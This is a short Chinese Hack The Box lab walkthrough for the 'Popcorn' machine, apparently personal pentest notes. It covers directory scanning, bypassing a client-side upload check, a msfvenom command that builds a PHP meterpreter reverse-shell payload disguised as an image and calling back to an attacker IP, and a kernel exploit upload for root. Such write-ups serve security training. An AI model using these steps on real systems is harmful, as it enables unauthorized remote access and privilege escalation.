Hackthebox 渗透测试笔记-popcorn[linux提权]

nmap一波出22和80
思路大概就是shell+提权
访问80是一个apache的初始页面
用kali自带的dirb进行目录扫描

dirb http://10.10.10.6
扫描到了一个网页
发现上传点在编辑torrent这个地方，JS前段绕过传一个shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f raw > a.png.php


然后设置handler

这里其实先设置handler然后设置payload也可以

接下来就是设置Lhost了
打过去之后获得shell
继续提权
这里使用msf的linux kernal exp

看到内核版本，那么在searchexploit 里面搜索，我选择了 15704
在msf里面上传
upload /usr/share/exploitdb/exploits/linux/local/15704.c
至于为什么要编译一次，应该是因为Linux的各种版本很多，直接传二进制可能运行起来有问题
接下来编译c代码，执行exp，获得root权限